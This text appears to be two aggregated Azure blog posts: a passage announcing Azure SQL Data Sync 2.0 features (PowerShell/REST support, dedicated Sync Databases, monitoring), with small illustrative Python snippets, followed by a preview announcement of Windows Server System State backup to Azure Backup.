Previously in Data Sync, creating Sync groups and making changes had to be done manually through the UI. This could be a tedious, time-consuming process, especially in complex Sync topologies with many member databases or Sync groups. Starting in July, Data Sync will support PowerShell and REST APIs, which developers can leverage to make these tasks faster and easier. This is also great for the many users who are comfortable with and prefer using PowerShell.

Better security, better privacy, better resilience

In the previous design, Data Sync used a central shared database in each region to manage Sync operations. Now each user will have a dedicated, user-owned Sync Database, which is a customer-owned Azure SQL Database. By replacing the shared central databases with customer-specific databases, we provide better privacy and security. In addition, this gives users the flexibility to increase or decrease the performance tier of the Sync Database based on their needs.

Sync Database Requirements

Azure SQL Database of any service tier
Same region as the Hub Database of its Sync Group(s)
Same subscription as its Sync Group(s)
One per region in which you have a Sync Group (Hub Database)
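The region and subscription requirements above can be expressed as a simple validation. The sketch below is purely illustrative (the record fields are assumptions, not part of any Azure API) and just encodes the two co-location rules:

```python
from dataclasses import dataclass

@dataclass
class Database:
    """Illustrative record; the fields are assumptions, not an Azure API."""
    name: str
    region: str
    subscription: str

def validate_sync_database(sync_db, hub_db):
    """Check the Sync Database requirements listed above against a Hub Database."""
    problems = []
    if sync_db.region != hub_db.region:
        problems.append("Sync Database must be in the same region as the Hub Database")
    if sync_db.subscription != hub_db.subscription:
        problems.append("Sync Database must be in the same subscription as the Sync Group")
    return problems

hub = Database("hub", "westus", "sub-1")
ok = validate_sync_database(Database("syncdb", "westus", "sub-1"), hub)
bad = validate_sync_database(Database("syncdb", "eastus", "sub-1"), hub)
print(ok, bad)  # [] and one region complaint
```

Note that the "one per region" rule means a single Sync Database can serve every Sync Group whose Hub Database lives in that region.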

Enhanced monitoring and troubleshooting

We have made a few key improvements to monitoring and troubleshooting. Users can now monitor the sync status programmatically using PowerShell and RESTful APIs. In addition, we’ve improved several error messages, making them clearer and more actionable.
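Programmatic monitoring usually boils down to a polling loop around whatever status call the service exposes. The sketch below is a generic pattern, not actual Data Sync code: `get_sync_status` is a hypothetical callable standing in for the real PowerShell cmdlet or REST endpoint, and the status strings are assumptions:

```python
import time

def wait_for_sync(get_sync_status, timeout_s=300, poll_s=10):
    """Poll a status callable until sync succeeds, fails, or times out.

    `get_sync_status` is a hypothetical stand-in for the actual
    PowerShell cmdlet or REST call; here it is assumed to return
    strings such as "Progressing", "Succeeded", or "Failed".
    """
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        status = get_sync_status()
        if status in ("Succeeded", "Failed"):
            return status
        time.sleep(poll_s)
    return "TimedOut"

# Example with a canned status sequence instead of a live service.
statuses = iter(["Progressing", "Progressing", "Succeeded"])
print(wait_for_sync(lambda: next(statuses), poll_s=0))  # Succeeded
```

In an automation script, a `"Failed"` or `"TimedOut"` result is where the improved error messages would be surfaced to the operator.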

Next steps

New users

If you would like to try Data Sync, refer to this tutorial.

Existing users

Existing users will be migrated to the new service starting June 1, 2017. For more information on migration look at the blog post “Migrating to Azure SQL Data Sync 2.0.”

More resources

Getting Started with Data Sync
Migrating to Data Sync 2.0
Azure Forums
PowerShell Script Link
Link to CSS

Going forward

We will continue to add features and make improvements to Data Sync as we work towards General Availability. Please ask any questions in the Azure SQL Database forums and post feedback in User Voice. We greatly appreciate any feedback.
Source: Azure

Protect Windows Server System State to cloud with Azure Backup!

One of the key endeavors of the cloud-first approach of Azure Backup is to empower enterprises to recover from security attacks, corruptions, disasters, or data loss situations quickly, securely, and reliably.  Restoring servers efficiently in the wake of evolving IT threats involves going beyond recovering data alone from backups. Our customers have expressed varying degrees of complexity in how their operating systems and applications are configured. Restoring this dynamic configuration captured in the form of the Windows Server System State, in addition to data, with minimum infrastructure, forms a critical component of disaster recovery.

Today we are extending the data backup capabilities of the Azure Backup agent to enable customers to perform comprehensive, secure, and reliable Windows Server recoveries. We are excited to preview the support for backing up Windows Server System State directly to Azure with Azure Backup.

Azure Backup will now integrate with the Windows Server Backup feature that is available natively on every Windows Server and provide seamless, secure backups of your Windows Server System State directly to Azure, without the need to provision any on-premises infrastructure.

Value proposition

Comprehensive Protection for Active Directory, File Servers, and IIS Web Servers: Active Directory (AD) is the most critical database of any organization and therefore requires a backup strategy that allows for reliable recoveries during critical scenarios. System State of a domain-controller server captures the Active Directory and the files required for domain-controller synchronization, and allows for targeted Active Directory protection and restores.
On a File Server, System State captures important file-cluster configurations and policies that protect files from unauthorized access. Combined with file-folder backup, the backup of System State with Azure Backup agent provides the ability to comprehensively recover File Servers.
On an IIS Web Server, System State captures the IIS Metabase, which contains crucial configuration information about the server, the site, and even files and folders, and is therefore the recommended option for restoring Web Servers.
Cost-Effective Offsite Backup for Disaster Recovery: System State for most Windows Servers is less than 50 GB in size. For that size, at $5 a month plus pay-as-you-go Azure storage, Azure Backup eliminates all infrastructure and licensing costs and enables you to protect your Windows Server System State for reliable restores. There is no need to provision local hard drives or offsite storage, or to employ additional tools or servers to manage System State backups and ensure their off-siting. Azure Backup takes care of off-siting System State to Azure on the schedule you specify!
Secure Backups: The enhanced security features built into Azure Backup and data-resilience offered by Azure ensure that your critical system state backups remain secure from malicious attacks, corruptions, and deletions.
Flexible Restores: With Azure Backup’s Restore-as-a-Service, you can restore System State files from Azure without any egress charges. Additionally, you can apply System State to your Windows Servers at your convenience using the native Windows Server Backup utility.
Single management pane in Azure: Backups of System State, files, and folders across all your Windows Servers can be monitored and managed centrally from the Recovery Services vault in the Azure portal.

Availability for Windows Server (Preview)

The support for backing up System State with Azure Backup agent is available in preview for all Windows Server versions from Windows Server 2016 all the way down to Windows Server 2008 R2!

Getting started

Follow the four simple steps below to start protecting your Windows Servers using Azure Backup!

Create an Azure Recovery Services Vault.
Download the latest version of the Azure Backup Agent from the Azure Portal.  
Install and Register the Agent.
Start protecting Windows Server System State and other Files and Folders directly to Azure!

Related links and additional content

New to Azure Backup? Sign up for a free Azure trial subscription.
Need help? Reach out to Azure Backup forum for support or browse Azure Backup documentation.
Tell us how we can improve Azure Backup by contributing new ideas and voting up existing ones.
Follow us on Twitter @AzureBackup for the latest news and updates.
Connect with us at the Azure Tech Community.

Source: Azure